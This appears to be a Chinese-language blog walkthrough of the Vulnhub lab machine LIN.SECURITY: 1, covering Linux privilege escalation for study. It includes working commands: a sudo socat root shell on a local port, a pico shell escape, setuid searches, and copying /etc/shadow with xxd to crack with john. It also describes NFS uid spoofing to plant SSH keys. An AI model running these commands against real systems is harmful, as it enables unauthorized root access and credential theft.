Vulnhub-靶机-LIN.SECURITY: 1

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站，需要发现目标靶机的IP地址，可以使用nmap，netdiscover，或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的，那么本次演示就是arp-scan工具发现

地址:https://www.vulnhub.com/entry/linsecurity-1,244/

sudo nmap -Pn -sC -sV -n -vvv -p- -oN linsec.nmap 192.168.202.9

nmap扫描结果

看了下靶机的描述，主要讲的是各种提权姿势，可参考：https://gtfobins.github.io/  靶机还给出了一个普通用户账号供测试联系提权姿势

连接登录上去

方法一：

 可以通过sudo提权的命令：

bob@linsecurity:~$ sudo -l
Matching Defaults entries for bob on linsecurity:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User bob may run the following commands on linsecurity:
    (ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env,
        /usr/bin/expect, /usr/bin/find, /usr/bin/ftp, /usr/bin/less, /usr/bin/man, /bin/more, /usr/bin/scp,
        /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi, /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl,
        /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp

使用socat进行提权

sudo socat tcp-listen:8833,reuseaddr,fork exec:sh,pty,stderr,setsid,sigint,sane

上面大概意思意思就是反弹到本地端口8833，然后获取权限就是连接此端口即可

socat FILE:`tty`,raw,echo=0 TCP:127.0.0.1:8833

使用sudo 执行ash提权

sudo bash提权

其他sudo执行提权

 rvim没有成功

git使用sudo提权姿势很多，具体如下：

下面需要执行的命令是：

sudo pico
^R^X
reset; sh 1>&0 2>&0
这里执行的实际类似nano执行的效果一样，上面的第二行是表示在键盘上按住ctrl+r和ctrl+x然后执行下面的命令，执行完成之后再次按住ctrl+r和ctrl+x再输入要执行的命令，比如id，那么就会以root权限执行

方法二：

 通过获取的密码hash是破解工具进行破解密码提权

方法三：

通过计划任务使用通配符进行提权

参考：https://blog.csdn.net/qq_27446553/article/details/80943097

方法四：

利用隐藏文件进行提权

查找隐藏文件：find / -name ".*" -type f -path "/home/*" -exec ls -al {} ;

找到了隐藏文件，获取了另一个用户的密码，使用su切换过去，同下面的命令找到setuid的二进制文件xxd

查找setuid权限的文件，并过来关键字snap
ls -alt `find / -perm -4000 -type f 2>/dev/null` | grep -v snap

执行xxd获取密码hash文件

 xxd /etc/shadow | xxd -r > shadowbmfx

然后通过john使用密码字典进行破解即可

方法五：

跟上面一样，不同的是这次是通过用户bob进行切换

关键命令

查找隐藏文件
find / -name ".*" -type f -path "/home/*" -exec ls -al {} ;

查找setuid权限的文件，并过来关键字snap
ls -alt `find / -perm -4000 -type f 2>/dev/null` | grep -v snap

同样是查找setuid的权限，但是查出来不显示
find / -perm -4000 -type f 2>/dev/null;

方法六：

通过taskset命令提权 参考：https://gtfobins.github.io/gtfobins/taskset/

方法七：

通过低权限nfs进行提权

上面是创建跟nfs挂载到本地的uid和gid一样的用户和用户组，然后本地kali使用 ssh-keygen生成密钥将公钥传到本地挂载的/mnt/perter目录下

权限改成600，没啥问题就能使用密钥登录目标靶机了，使用strace进行提权

参考：https://www.fenghlz.xyz/passages/2020-02-22-%E6%8F%90%E6%9D%83%E7%9F%A5%E8%AF%86%E5%AD%A6%E4%B9%A0-LIN-SECURITY%E9%9D%B6%E5%9C%BA/